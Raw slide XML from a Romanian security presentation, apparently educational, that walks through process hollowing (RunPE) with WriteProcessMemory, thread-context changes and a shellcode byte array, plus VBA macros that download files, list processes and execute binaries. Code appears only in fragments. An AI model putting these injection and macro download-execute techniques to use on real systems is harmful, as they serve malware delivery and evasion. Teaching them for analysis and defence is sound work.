          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Alocarea și scrierea în memoria procesului:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alocare - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Alocă memorie în procesul țintă corespunzătoare dimensiunii imaginii procesului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scriere - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Scrie headerul și secțiunile imaginii procesului în memoria alocată.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Modificarea contextului procesului țintă:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obținerea contextului - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Capturează starea registrelor procesului țintă.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setarea adresei de intrare - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Modifică registrul pentru a indica la noua adresă de intrare din imaginea injectată.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rescrierea și reluarea executării - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Actualizează contextul procesului și reia executia thread-ului său principal.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7961086" y="191247"/>
            <a:ext cx="4027714" cy="1013254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Injectare procese (II)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2747652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Detaliile tehnice ale procesului de injectare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1803853"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Începem cu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WriteProcessMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, o funcție crucială care permite scrierea directă în spațiul de memorie al procesului țintă. Aici vedem cum codul încearcă să scrie în proces, și dacă această operație eșuează, procesul este terminat pentru a evita corupția sau detectarea.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mai departe, codul navighează prin secțiunile imaginii procesului folosind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IMAGE_SECTION_HEADER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Acesta ajustează adresele de bază și scrie fiecare secțiune în procesul țintă. Această parte este esențială pentru a se asigura că toate componentele necesare executării sunt corect pozitionate în memoria procesului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>După scrierea efectivă, urmează ajustarea contextului procesului. Folosind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetThreadContext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>și </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SetThreadContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, codul ajustează registrii procesului țintă, inclusiv </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, care este setat să indice către noua adresă de intrare a codului injectat. Acest pas este vital pentru a direcționa execuția procesului către codul nou scris.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Finalizăm cu reluarea execuției procesului suspendat, permițând astfel codului injectat să ruleze în cadrul procesului țintă. Acest lucru se realizează prin apelul funcției </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ResumeThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624114" y="1610860"/>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07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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367284" y="3420760"/>
            <a:ext cx="5743229" cy="310762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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390144" y="281335"/>
            <a:ext cx="6096000" cy="2858090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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ResumeThread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TerminateProcess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lpPI</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unsigned</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hello_world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0x5A</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0x90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0x03</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0xFF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0xB8</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p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pP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0x69</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0x6E</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0x53</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0x68</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0x77</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0x43</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0x69</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0x70</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0x5F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0x74</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0x6F</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0x6D</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0x41</a:t>
            </a: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8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0x00</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8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8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US" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6681216" y="238663"/>
            <a:ext cx="6096000" cy="6184770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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main</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argc</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argv</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DWORD dwRet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PROCESS_INFORMATION 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ZeroMemory</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STARTUPINFO stSI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ZeroMemory</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stSI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stSI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WCHAR szArgs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runPE64</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stSI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reinterpret_cast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LPVOID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hello_world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szArgs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sizeof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szArgs</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WaitForSingleObject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INFINITE</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GetExitCodeProcess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dwRet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hThread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CloseHandle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stPI</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hProcess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dwRet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463284" y="0"/>
            <a:ext cx="45719" cy="6858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1574" y="2390162"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633801" y="3894788"/>
            <a:ext cx="5244485" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Funcția main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inițializare - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Pregătește structurile necesare pentru informații despre proces și inițializare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execuția funcției runPE64 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Apelează funcția pentru a injecta și executa codul binar hello_world într-un nou proces.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Așteaptă terminarea procesului - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Așteaptă finalizarea procesului injectat și apoi obține codul de ieșire.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161395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3850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ce observam?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524001"/>
            <a:ext cx="10515600" cy="5174342"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Această tehnică de codare este adesea utilizată în contexte de securitate pentru a analiza comportamentul malware-ului, pentru testarea software-ului într-un mediu controlat sau, din păcate, și în scopuri mai puțin etice, cum ar fi crearea de malware sau bypass-ul controlului de acces la resursele sistemului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In final, examinăm funcția main, care reprezintă punctul de intrare principal al programului nostru demonstrativ. Funcția main inițializează, execută funcția </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runPE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> și așteaptă finalizarea procesului injectat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Observăm că funcția main începe cu definirea și inițializarea variabilelor necesare pentru executarea runPE64. Acesta include structuri de tip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PROCESS_INFORMATION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> și </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STARTUPINFO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> care sunt esențiale pentru gestionarea și monitorizarea proceselor în Windows. Folosim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZeroMemory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> pentru a inițializa aceste structuri, asigurându-ne că nu există date reziduale care ar putea afecta comportamentul.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Partea critică aici este apelul la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runPE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, unde se transmite un shellcode definit în secțiunea de cod de sus. Shellcode-ul, reprezentat ca un array de octeți, este proiectat să execute operații specifice (posibil afișarea unui mesaj sau alte acțiuni simple) odată ce este injectat în procesul țintă.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>După executarea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runPE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, funcția main așteaptă terminarea procesului injectat folosind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WaitForSingleObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Aceasta permite procesului să se execute până la finalizare, iar apoi obținem codul său de ieșire prin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetExitCodeProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Acest pas este important pentru verificarea succesului execuției și pentru gestionarea erorilor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>În final, închidem handle-urile folosind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CloseHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, asigurând curățarea resurselor sistemului. Această practică este esențială pentru evitarea scurgerilor de memorie și a altor probleme de performanță.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Acest exemplu complet ne oferă o vedere de ansamblu asupra modului în care se poate realiza injectarea unui shellcode într-un proces, demonstrând pașii necesari de la pregătirea mediului de execuție până la curățarea post-execuție, subliniind complexitatea și riscurile asociate acestei tehnici în contextul securității informatice.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703942" y="1218975"/>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095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a:t>Download File &amp; Process List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300"/>
              <a:t>(API permite injectia de cod si din mediul VBA)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Visual Basic for Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7199376" y="2059116"/>
            <a:ext cx="4154733" cy="4394146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="780095" y="5248967"/>
            <a:ext cx="4834321" cy="1204294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="780097" y="2059115"/>
            <a:ext cx="4834319" cy="1571475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="780095" y="3711641"/>
            <a:ext cx="4834321" cy="1456275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4120896" y="2389603"/>
            <a:ext cx="2851250" cy="854342"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86425"/>
              <a:gd name="adj2" fmla="val -711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URLDownloadToFileA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4120896" y="4130150"/>
            <a:ext cx="2474976" cy="758842"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -94232"/>
              <a:gd name="adj2" fmla="val -66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DownloadFile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053840" y="5748527"/>
            <a:ext cx="2542032" cy="841219"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80193"/>
              <a:gd name="adj2" fmla="val -400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GetProcessList</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangular Callout 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8557106" y="2389603"/>
            <a:ext cx="2474976" cy="758842"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35119"/>
              <a:gd name="adj2" fmla="val 114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Toate API-urile sunt accesibile !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1173717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Basic for Applications (VBA) pentru operarea cu fișiere și procese</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="780143" y="1999796"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Funcția </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLDownloadToFileA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, care este un exemplu clasic de utilizare a API-urilor Windows în VBA pentru a descărca un fișier de pe internet direct pe discul utilizatorului. Aceasta este o metodă des utilizată în scripturi automate, dar, cum subliniază slide-ul, este și o potențială cale de injectare a codului malițios, datorită accesului direct la resursele sistemului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mai departe, funcția </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> demonstrează cum se poate folosi obiectul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft.XMLHTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>pentru a solicita și primi fișiere într-un mod care permite manipularea fină a cererii HTTP și a răspunsurilor. Aceasta oferă flexibilitate în gestionarea datelor, dar, de asemenea, necesită atenție sporită la securizarea acestor operațiuni pentru a preveni vulnerabilități.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ultima funcție, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetProcessList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, ilustrează cum se pot accesa și enumera procesele rulând pe un sistem, folosind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Winmgmts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Aceasta este o capabilitate puternică care permite scripturilor VBA să interacționeze direct cu alte aplicații și servicii ale sistemului. Acest lucru poate fi util în contexte legitime, cum ar fi monitorizarea performanței sistemului sau automatizarea sarcinilor administrative, dar, în mâinile greșite, poate fi folosit pentru monitorizarea neautorizată a activităților utilizatorului.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="689427" y="1725500"/>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119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Execute Binary</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visual Basic for Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5251346" y="2151538"/>
            <a:ext cx="6271655" cy="1868742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770168" y="5471763"/>
            <a:ext cx="7623616" cy="965613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
